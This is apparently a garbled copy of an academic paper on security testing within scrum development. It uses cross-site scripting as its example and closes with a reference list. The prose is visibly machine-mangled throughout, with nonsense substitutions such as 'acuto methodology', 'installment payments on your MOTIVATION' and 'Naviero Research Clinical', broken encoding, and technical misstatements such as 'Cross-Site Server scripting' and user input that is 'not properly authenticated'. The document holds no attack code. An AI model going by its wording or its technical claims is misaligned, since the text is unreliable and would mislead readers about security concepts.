Security testing from point of view of scrum development
Rudra Prasad Tripathy
Ph. D. scholar, Utkal university
Technical architect, JDA india software(P) Ltd.
Ranjit Kumar Grupo
Senior Professional, MindTree Limited
panda. [email protected] com
AbstractвЂ” We are trying to show just how security assessment plays predominant role in secured advancement and through agile methodology-particularly scrum is known as a suitable expansion process. Keywords-scrum; security testing.
1 . Advantages
Application security is in attention intended for last few years exactly where security you can forget allures to network protection and transcen. Security testing is also heart of secured development though it's to not get its because of importance. In this paper we would discuss issues involved in protection testing in traditional computer software development lifecycle approach just like waterfall and would match up against scrum technique, which is a acuto methodology to determine how it could smoothen few issues and would assist in security assessment. We would take cross-side server scripting as the example to illustrate the research. 1 . 1What is security testing?
Software security would basically works with the situation to attempt to break the application as what an attacker would carry out. This is totally different from traditional screening because of subsequent idiosyncratic features. a. Traditional testing will not deal with what happens if it fails, where as protection testing goal to break the machine and might play a role of antagonist. Therefore it requires dexterity and knowledge to attract suitable test out cases apart from tools and frameworks.. n. This would be a part of risk management and so need to reckon the cost involved. We may have to define enough security  parlance to application's business domain and value task aimed at. For example definition of adequate security a online visa or mastercard application and online health care system might differ. Consequently prioritization and budgeting of resources are few elements need to be regarded as. c. Assessment of different feasible vulnerabilities .
1 . 2Security screening approaches.
At present application protection testing has been done like a white box testing, may be with by using a few tools like static analysis tools to study the vulnerability. As well non efficient testing have been conducted to see chance of failures against vicarious attack of adversary. 1 ) 3Cross-Site Server scripting
Cross-Site Server scripting (XSS) vulnerabilities were tested as doing code on the web application. This kind of occurs once dynamically made web pages display user insight, such as logon information, that is not properly authenticated, allowing an attacker to embed malicious scripts into the generated webpage and then perform the script on the machine of any computer user that opinions the site. XSS can generally be subdivided into two categories-stored and reflected disorders. Stored problems are something like form stored on the target server, including in a databases, or by way of a submission into a bulletin plank or visitor log. Reflected attacks, however, come from elsewhere. This happens when user insight from an internet client can be immediately included via server-side scripts within a dynamically generated web page. Inadequate filtering of client-supplied info that is delivered to web users by the internet application may be the major trigger. In many cases, the client-supplied info is being employed in the HTTP headers, which may be used by using carriage return-linefeed sequence-an attacker can also add HTTP headers to the response and totally write the body system of the HTTP request. installment payments on your MOTIVATION
In one of the web program, an XSS was located through make use of third party application. This was a vital defect. Design had been built and after rendering code have been tested by simply security complying team. Cross-site scripting accomplished on websites were roughly many of these of all security vulnerabilities noted by Symantec as of 2007. A full security review usually involves more...
References: 1]Bruce Potter and McGraw Gary, " Software Reliability TestingвЂќ [Article], IEEE Security and Privacy. 2005. pp. 32-35.
2]C. E. Landwehr et ing., " A Taxonomy of Computer System Security Imperfections, with ExamplesвЂќ, tech. report NRL/FR/5542вЂ”93/9591, Naviero Research Clinical, Nov. 1993.
3]Allen Julia, Barnum Sean, Ellison Robert, McGraw Gary and Mead Nancy. " Computer software Security: Helpful information for Project ManagersвЂќ, Addison-Wesley, 2008.
4]Steve Lipner, Michael Howard, вЂќThe Reliable Computing Security Development LifecycleвЂќ, Security Architectural and Marketing and sales communications Security Business and Technology Unit, Microsoft Corporation, March 2005.
5]Noopur Davis, вЂќSecure Software program Development Your life Cycle ProcessesвЂќ, Software Anatomist Institute, 2009.
6]E Tsipenyuk, N Chess, G McGraw - IEEE Protection & Privacy Magazine, 2006
7]OWASP Top Most Critical Internet Application Secureness Vulnerabilities, http://www.owasp.org/documentation/topten.html